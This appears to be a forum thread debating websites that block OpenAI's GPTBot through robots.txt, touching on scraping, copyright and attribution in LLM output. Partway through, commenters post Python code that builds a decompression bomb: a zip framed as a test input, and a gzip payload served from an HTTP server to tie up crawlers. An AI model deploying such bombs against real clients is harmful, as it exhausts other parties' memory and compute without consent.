It's worth noting that in this case "blocking" means "asking nicely for it not to index them" - so how effective this is depends on how well behaved the bots are.
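For reference, the block in question is usually just a robots.txt entry like the one OpenAI documents, and honoring it is entirely up to the crawler:

    User-agent: GPTBot
    Disallow: /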
There is a danger, though, if certain types of sites are more likely to block GPTBot than others, because that would skew the data set it trains on, which could have longer-term impacts on all the content generated with it. If all the good-quality sites block it and the sites full of AI-generated junk don't, that sounds like a downward spiral.
You can also just do that for no particular reason. Language models aren't going to go anywhere worthwhile if this is their primary mode of data gathering.
I needed to test whether an app could decompress inputs over 2GB properly. I managed it with a zip file of about 45k. I think the record is something like 5k, but 50k fits just fine in a repository.
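For anyone curious, here's a minimal sketch of the trick in Python (file names and exact sizes are my own, not the parent's setup). DEFLATE compresses a run of zeros at roughly 1000:1, so a single-layer entry of just over 2 GiB comes out around 2 MB; getting into the tens-of-KB range takes nested archives or similar tricks:

    import zipfile

    # Stream just over 2 GiB of zeros into one DEFLATE-compressed entry.
    # force_zip64 is needed because the uncompressed size exceeds 2 GiB.
    with zipfile.ZipFile("big.zip", "w", compression=zipfile.ZIP_DEFLATED) as zf:
        with zf.open("zeros.bin", mode="w", force_zip64=True) as entry:
            chunk = b"\x00" * (1024 * 1024)   # 1 MiB of zeros
            for _ in range(2049):             # 2049 MiB, just over 2 GiB
                entry.write(chunk)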
Set up direct Gzip sendfile, and that’ll keep them busy for a while.
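A rough sketch of that idea, assuming a bare-bones Python server and made-up file names: gzip a large run of zeros once, then serve the compressed bytes verbatim with Content-Encoding: gzip, so the client pays the cost of inflating them:

    import gzip
    import http.server

    # One-time: build a small .gz file that inflates to ~1 GiB of zeros
    # (zeros compress at roughly 1000:1, so it's about 1 MB on disk).
    with gzip.open("bomb.gz", "wb", compresslevel=9) as f:
        chunk = b"\x00" * (1024 * 1024)
        for _ in range(1024):
            f.write(chunk)

    class BombHandler(http.server.BaseHTTPRequestHandler):
        def do_GET(self):
            with open("bomb.gz", "rb") as f:
                payload = f.read()
            self.send_response(200)
            # The client sees a normal gzip response and inflates it.
            self.send_header("Content-Encoding", "gzip")
            self.send_header("Content-Type", "text/html")
            self.send_header("Content-Length", str(len(payload)))
            self.end_headers()
            self.wfile.write(payload)

    http.server.HTTPServer(("", 8080), BombHandler).serve_forever()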
If I’m paying for servers by the hour and half of them are run just to keep the bots happy, I’m going to have opinions about who is allowed to visit my pages and for what reason. Mooches don’t have a moral leg to stand on.
Even without all those, suppose the Washington Post publishes a big exclusive story: many websites will paraphrase the article and likely link to it, and many of them don't block GPTBot. Even without the exact words, GPT should easily be able to piece together the original story from multiple sources. I don't see blocking being helpful in such cases.
Yes, this (and that I don't trust the bots) is why I've removed my websites from being publicly accessible. It's the only way I can think of to be sure I'm not contributing to these models in any meaningful way.
Most new content is scraped and reposted on dozens of copycat sites within minutes of being posted. Pinterest.com may have blocked gptbot, but MySketchyPinterestClone.net hasn't, and has all the same content.
Regardless of where you stand on the LLM vs Copyright debate, that 3rd party would clearly be violating copyright by selling unlicensed content, though?
If a third party presents itself as a network operator (basically, acts as a proxy/dumb pipe) or a library (if it keeps a cache), it isn't liable, is it? I think not, because proxy and VPN providers, or CloudFlare's 1.1.1.1, or the Internet Archive are, AFAIK, not generally considered liable in any sort of infringement.
Oh, I wasn't aware. Thank you for pointing that out. From what I've read, even though there's an injunction, IA was going to appeal, so I hope this isn't exactly over yet?
I don't own any revenue generating websites, but I do feel like the content I create is useful. I'd rather have GPT slurp it up with the hope of some small piece of me being emitted now or in the future for others to benefit from.
I'm sure my perspective would be different if I was paying my employees to create unique content for our brand, though.
I'm not sure, though. At the end of the day, I think I'd rather information be free. But that's not a sustainable model in many industries.
AI should not behave as if it has inherent knowledge; there should be acknowledgement similar to 'I saw on the web the other day' or 'I was cURLing coolrecipes.com and it gave me a new idea for a Halloween cake'.
Humans skip attribution in their conversations all the time when it's not the subject. Why should machines be held to different standards, especially if we want them to sound and behave naturally?
"I saw on the web the other day" is not attribution, it's basically an interjection that makes the conversation smoother. Most of time it means absolutely nothing, except for maybe "it's not my direct experience" at best (and AFAIK LLMs today don't really have any agency, so this disclaimer is moot/noise).
Sure, "I've read an article on Acme Daily" happens, but personally I typically do this as a cue for the listener to cut me off with "ah, yes, I've read this too", saving us both time. Other use case is to give signal about authenticity of the information: not a credit, again - just an indirect indicator of trustworthiness or reliability (when I hear "The Onion reports" - it's surely not about the website, it's about the following being satire). YMMV, of course. I sure want an LLM to write this, but only when it matters to me personally (not the website authors, they aren't a party in our conversation). Just like a human would.
Similarly, I don't think anyone has ever said "I've found this on coolrecipes.com" unironically when the conversation is about the recipe rather than its source. Obviously, attributing it to someone both parties know, like a relative, neighbor, or a celebrity, is a different story, roughly the same as the news example above. But if you hear "found on coolrecipes.com", it's most likely an ad. And what I want to say here is that LLMs today are a breath of fresh air compared to modern enshittified search engines, specifically because they're not ad- and SEO-ruined (yet). Let us please keep it this way for as long as possible.
> Humans skip attribution in their conversations all the time
ChatGPT is not a human. If a news site were to publish some information on their website without attribution, this would be a problem. ChatGPT is more analogous to a news site than to some person you have a conversation with.
I think then you're back to search engines, just presenting results slightly differently. From the way I understand LLMs work, I think attribution is almost impossible.
Conversational AI seems to be the big ask. If you verbally prompted it down that particular path, it could start by stating 'I've read a lot of high school books' and 'my teachers always said that 2+2=4'.
The idea is to enable the prompter to review the information and see for themselves, should they need to.
And yet you didn't cite any of the reference material you used to post that reply, or any of the reference material that led to you having that opinion in the first place.
I'm not being flippant here. We all use massive amounts of reference material to even think the most basic thoughts. Expecting you, or an algorithm, to be able to quote or even know the reference material that led to anything you say is a pretty high bar.
Worse - quite frequently reference material is a mashup of different ideas and stories that we've obtained from multiple sources over time.
Just like in literature: tropes are standalone entities, and they evolve over time. While a trope can be attributed to some book or author, it evolves, gets mixed up, gets deconstructed, and may end up as something barely recognizable. Should an LLM be forced to always give a nod to Asimov or Čapek when talking about, say, Bender from Futurama, if this is not explicitly relevant to the conversation? I highly doubt it; that would make conversations intolerably stuffy. Talking about virtually any topic would end with a footnotes list multiple pages long.
Our (human) "normal" common sense to attribution is to ditch any and all, unless it's relevant for some reason. Because we generally try to stay focused. People or conversation machines attributing recipes to website addresses is a Black Mirror episode material, a corporate wet dream.
If the AI were a public utility, that would be great. Currently, we have to ask OpenAI/Microsoft for permission every time we want to access the knowledge source.
True, but there are free and publicly available models and while they're considered to be worse than OpenAI offerings, they aren't that bad. Or at least I hope so.
I would love to sit down with 10 random website owners / managers from this list and ask them the following questions:
- Why did you block GPTBot?
- Are you aware that your content is scraped, directly copied, and otherwise repurposed by other websites that don't block GPTBot?
- What are your plans if, in future iterations of GPT, you see that the model has information that you wrote or produced? Are you going to fight it, and if so, how?
I think these are legitimate questions, and I would love to hear the answers to them, because I would love nothing more than OpenAI being hamstrung over the bullshit they pulled last year with ChatGPT.
Never forget that OpenAI stole the web and has had $11.3B in funding[0] and is seeking another round to place it at a $80-90 billion valuation[1].
I block AI scrapers because I don't think that these systems are good for society and I don't want to help make them better.
> Are you aware that your content is scraped, directly copied and otherwise repurposed by other website that don't block GPTBot?
Yes, which is why I've removed my sites from being publicly accessible.
> What are your plans if in future iterations of the GPT model
None. There's nothing I can do about it after it's been ingested, so the only realistic thing to do is to let it go and do my best to prevent it from happening with new stuff.
There is a big difference between copying and stealing. People who copy don’t get sued, people who steal do.
Although I am not exactly sure about the difference anyway.
Also, if you are going to make an argument, then please do it. I don’t exactly appreciate shallow comments when I have plenty of evidence to show as a rebuttal.
A human reads something for free or "free" (if they're a product for advertisers or data collectors), and no one bats an eye if they retell it to others. There are whole careers built on this: teachers, instructors, advisors.
But if it's a machine (or a superhuman; I want to hope we'll see AGI someday) that can do this at scale, the whole world is suddenly upside down. I honestly have no idea how things should be (I have opinions, but I cannot really validate them, so they're just... opinions), but I find it interesting.
Being a pessimist and a strong believer that humanity as a whole leans towards the shittiest-but-cheapest solutions (down to a certain threshold, of course, but the bar is rarely high), my guess is that those websites will eventually try to monetize LLMs the way they do with humans: by injecting ads into the information provided. Fear the day a new breed of SEOs starts spamming, inventing fancier and fancier techniques of, ahem, enriching the models with customer-oriented targeted promotional materials (or whatever). And so history will repeat itself.
I really don't understand why sites would do this. To each their own, but it currently lowers my opinion of the site. I was disappointed to see NPR and Ars on the list.
That's a good question... I suppose it seems to me like they're trying to keep useful information locked down. Even though this bot isn't 'public', it still feels a bit like an author saying they don't want their book in a library. Actually, it's even worse than that, because they want to pick and choose who is allowed to read their words.
I guess another way I see it is like the site has put a banner at the top saying I can read their content, but can't use anything I learn from it, and can't tell you or anyone else about anything I've read. I get that in this case the 'me' is an algorithm and not a person, but does that really matter? If I read a lot of info on welding and then offer a 'learn to weld' class, how much does that differ from what the openai algorithm is doing. (And if it is public, are these same sites going to welcome the bots? I doubt it)
It also seems rather reactive and not well thought out. To quote an Ars article (which GPTBot can't read):
> As a thought experiment, imagine an online business declaring that it didn't want its website indexed by Google in the year 2002—a self-defeating move when that was the most popular on-ramp for finding information online.[1]
Or a couple of quotes from Stephen King on another site that GPTBot can't read[2]:
> I have said in one of my few forays into nonfiction (On Writing) that you can’t learn to write unless you’re a reader, and unless you read a lot.
> Would I forbid the teaching (if that is the word) of my stories to computers? Not even if I could. I might as well be King Canute, forbidding the tide to come in. Or a Luddite trying to stop industrial progress by hammering a steam loom to pieces.
As I said, to each their own. I just would have expected a site like NPR, which lists its mission as "to create a more informed public", not to take actions that work directly against that goal.
Very interesting. It would never have occurred to me that anyone would equate "I don't want this to train AI" with "I don't want people to learn this".
OpenAI is trying to set a precedent of default approval for crawling and training AIs on copyrighted content. Compared to search crawling, it doesn't offer anything in return.